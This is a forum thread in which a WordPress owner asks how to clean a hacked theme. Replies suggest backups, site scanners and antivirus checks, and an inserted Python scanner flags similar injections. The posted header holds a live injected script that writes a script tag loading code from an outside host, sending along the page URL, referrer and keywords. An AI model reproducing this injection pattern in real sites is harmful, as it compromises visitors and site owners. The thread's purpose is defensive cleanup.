Malware
Sergey Gulin, 2016-11-23 12:04:43

Viruses on WP, can't find what to do?

Good day to all. A major attack was made on the site, and a large amount of malware was uploaded. Here is one of the code examples; I can't find it myself:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">

  <title><?php bloginfo('name'); ?><?php wp_title(); ?></title>

  <meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />	
  <meta name="generator" content="WordPress <?php bloginfo('version'); ?>" /> <!-- leave this for stats please -->

  <link rel="stylesheet" href="<?php bloginfo('stylesheet_url'); ?>" type="text/css" media="screen" />
  <link rel="stylesheet" href="<?php bloginfo('stylesheet_directory'); ?>/css/flexslider.css" type="text/css" />
  <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="<?php bloginfo('rss2_url'); ?>" />
  <link rel="alternate" type="text/xml" title="RSS .92" href="<?php bloginfo('rss_url'); ?>" />
  <link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="<?php bloginfo('atom_url'); ?>" />
  <link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
  
  <?php wp_enqueue_script('jquery'); ?>
  <?php wp_enqueue_script('jquery-ui-tabs'); ?>
  <?php //wp_enqueue_script('jcarousellite', get_template_directory_uri() . '/js/jcarousellite_1.0.1.min.js', array( 'jquery' ), '', true);?>
  <?php wp_enqueue_script('flexslider', get_template_directory_uri() . '/js/jquery.flexslider-min.js', array( 'jquery' ), '', true);?>
  <?php wp_get_archives('type=monthly&format=link'); ?>
  <?php //comments_popup_script(); // off by default ?>
  <?php wp_head(); ?>
  
  <!-- Yandex.Metrika counter -->
  <script type="text/javascript">
  (function (d, w, c) {
    (w[c] = w[c] || []).push(function() {
      try {
        w.yaCounter123 = new Ya.Metrika({id:123,
            clickmap:true,
            trackLinks:true,
            accurateTrackBounce:true});
      } catch(e) { }
    });

    var n = d.getElementsByTagName("script")[0],
      s = d.createElement("script"),
      f = function () { n.parentNode.insertBefore(s, n); };
    s.type = "text/javascript";
    s.async = true;
    s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js";

    if (w.opera == "[object Opera]") {
      d.addEventListener("DOMContentLoaded", f, false);
    } else { f(); }
  })(document, window, "yandex_metrika_callbacks");
  </script>
  <noscript><div><img src="//mc.yandex.ru/watch/123" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
  <!-- /Yandex.Metrika counter -->
  <script>
    jQuery(document).ready(function($) {
      $('.page-item-4620 a').attr("href", "http://site.ru/");
      $('.page-item-4620 a').attr("target", "_blank");
      $('.page-item-4624 a').attr("href", "http://site.ru/");
      $('.page-item-4624 a').attr("target", "_blank");
    })
  </script>
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://talentosdavidfischman.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
</head>
<body>
<div id="wrapper">
  <div id="header">
    <div id="branding">
      <div class="stitle" role="banner" onclick="location.href='/';" style="cursor: pointer;">
        123
      </div>
      <div class="enter"><a href="/wp-admin">Войти</a></div>
      <div class="social">
        <a class="twit" target="_about:blank" href="http://twitter.com" title = "Твиттер"> <img src="<?php echo get_template_directory_uri(); ?>/imgs/twitter.gif" height="30" /> </a>
        <a class="vk" target="_about:blank" href="http://vk.com" title = "ВКонтакте"> <img src="<?php echo get_template_directory_uri(); ?>/imgs/vk.gif" height="30" /> </a>
        <a class="fb" target="_about:blank" href="http://facebook.com" title = "Facebook"> <img src="<?php echo get_template_directory_uri(); ?>/imgs/fb.gif" height="30" /> </a>
        <a class="jj" target="_about:blank" href="http://livejournal.com/" title = "ЖивойЖурнал"> <img src="<?php echo get_template_directory_uri(); ?>/imgs/livejournal.gif" height="30" /> </a>
        <a class="rss" target="_about:blank" href="/feed" title = "Новостная лента"> <img src="<?php echo get_template_directory_uri(); ?>/imgs/rss.gif" height="30" /> </a>
      </div>
      <div class="search">
        <?php get_search_form(); ?>
      </div>
    </div>
  </div> <!-- #header -->
  
  <div id="nav-menu">
        <?php wp_nav_menu( array( 'container_class' => 'menu-header', 'theme_location' => 'primary' ) ); ?> 
  </div>
    
  <div id="main">

4 answer(s)
Maxim Timofeev, 2016-11-23
@webinar

Everything is very simple: use the backup beforehand; ideally, close the holes through which the attack was made.

Ivan Sergeev, 2016-11-23
@ivan3008

Antiviruses for computers do not work well to catch this type of infection.
Try a special utility for cleaning sites - I cured a few with it, there were no problems:
Link
It displays a list of infected and suspicious files, and the places where the malicious code is located.

bsf, 2016-11-23
@bsf

From practice, the scheme is usually like this if the copies are also "sick".
If the OS on the computer is Windows, disable all antiviruses. We download the site to the computer via FTP. We archive it with a password so that the antivirus does not clean everything in the archive. We turn the antivirus on and set it loose on the directory. We look at what it complains about and start removing all the injections in the code by hand.
The Chrome console also helps with cleaning. If the virus code is loaded from a third-party site, you can track which JS file it comes through.
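
The hand-cleaning step in the answer above can be narrowed down with a small scanner. The following is an added example, not code from the thread: it flags inline scripts that share the traits of the injected block in the question (a `document.write` of a script tag, a split closing tag, a `.php` script URL, the page URL or referrer in the query string). The sample input, the hosts `stats.example` and `injected.example`, the rule set and the `min_hits` threshold are all assumptions.

```python
import re

# Heuristics taken from the shape of the injected block in the question.
RULES = {
    "document.write emits a <script> tag":
        re.compile(r"document\.write\s*\(\s*['\"]<script", re.I),
    "closing </script> split across string literals":
        re.compile(r"<['\"]\s*\+\s*['\"]/script>", re.I),
    "script src points at a .php URL":
        re.compile(r"src\s*=\s*[\"']?['\"\s+]*https?://[^'\"\s]+\.php\b", re.I),
    "page URL or referrer appended to a query string":
        re.compile(r"[?&][\w-]+=['\"]\s*\+\s*(?:encodeURIComponent\(\s*)?"
                   r"(?:window\.location|document\.referrer)", re.I),
}
# Inline script bodies; the split closing tag keeps the injected body in one match.
SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)


def scan(text, min_hits=2):
    """Return [(line_number, [rule names])] for inline scripts hitting >= min_hits rules."""
    findings = []
    for m in SCRIPT.finditer(text):
        hits = [name for name, rx in RULES.items() if rx.search(m.group(1))]
        if len(hits) >= min_hits:
            line = text.count("\n", 0, m.start()) + 1
            findings.append((line, hits))
    return findings


# Constructed sample: a benign async loader followed by an injected one-liner
# modelled on the question's block (hosts replaced with placeholders).
SAMPLE = """<head>
<?php wp_head(); ?>
<script type="text/javascript">
  var s = document.createElement("script");
  s.async = true;
  s.src = (document.location.protocol == "https:" ? "https:" : "http:") + "//stats.example/watch.js";
  document.getElementsByTagName("script")[0].parentNode.appendChild(s);
</script>
<script>null==getCookie("__cfgoid")&&document.write('<script type="text/javascript" src="' + 'http://injected.example/js/jquery.min.php' + '?key=b64' + '&utm_source=' + window.location.host + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>');</script>
</head>
"""

if __name__ == "__main__":
    for line, hits in scan(SAMPLE):
        print(f"line {line}: " + "; ".join(hits))
```

Run over each theme and plugin file, this gives a short list of lines to inspect by hand; a hit is a lead to review, not proof of infection.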

Ankhena, 2016-11-23
@Ankhena

I once sent a file to Doctor Web, and they helped.
And the hoster is also interested in sites without viruses, so support usually helps.
